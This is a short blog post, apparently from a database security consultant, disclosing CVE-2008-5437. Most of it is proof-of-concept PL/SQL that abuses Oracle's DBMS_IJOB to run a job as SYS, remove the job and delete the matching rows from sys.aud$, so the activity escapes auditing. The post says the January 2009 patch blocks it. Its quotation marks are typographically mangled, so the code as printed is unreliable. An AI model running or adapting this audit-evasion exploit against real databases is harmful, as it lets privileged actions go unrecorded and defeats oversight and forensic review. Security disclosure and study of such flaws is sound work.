Proof-of-concept how to bypass Oracle Auditing using DBMS_IJOB

Here is the proof of concept code for the issue in dbms_ijob [CVE-2008-5437] from Volker Solinus, a really smart DBA, my former colleague from Oracle Consulting Germany.

A different bug concerning Auditing reported by us is still open. Oracle Auditing alone is not sufficient because there are various ways to bypass it. . Often it is better to use a 3rd-party solution like Hedgehog from Sentrigo.

— Bypassing Oracle Auditing
— Everything executed via dbms_ijob (granted to DBAs by default)
— will not appear in the Oracle auditing
— by Volker Solinus

declare
jj    integer := 666666;    — job number
begin
sys.dbms_ijob.submit(
JOB =>        jj,
LUSER =>    ‚SYS‘,
PUSER =>    ‚SYS‘,
CUSER =>    ‚SYS‘,
NEXT_DATE =>    sysdate,
INTERVAL =>    null,
BROKEN =>    false,
WHAT =>        ‚
declare
jj    integer := ‚||jj||‘;
begin
execute immediate “alter system archive log current“;
sys.dbms_ijob.remove(jj);
delete from sys.aud$ where obj$name = “DBMS_IJOB“;
commit;
end;‘,
NLSENV =>     ‚NLS_LANGUAGE=“AMERICAN“ NLS_TERRITORY=“AMERICA“ NLS_CURRENCY=“$“ NLS_ISO_CURRENCY=“AMERICA“ NLS_NUMERIC_CHARACTERS=“.,“ NLS_DATE_FORMAT=“DD-MON-RR“ NLS_DATE_LANGUAGE=“AMERICAN“ NLS_SORT=“BINARY“‘,
ENV =>        hextoraw(‚0102000200000000‘));
sys.dbms_ijob.run(jj);
exception when others then
if sqlcode=-12011 then
sys.dbms_ijob.remove(jj);
end if;
raise;
end;
/
After applying the January CPU 2009 you will get the following error message:

ERROR at line 1:
ORA-12718: operation requires connection as SYS
ORA-06512: at line 32

Leave a Reply

You must be logged in to post a comment.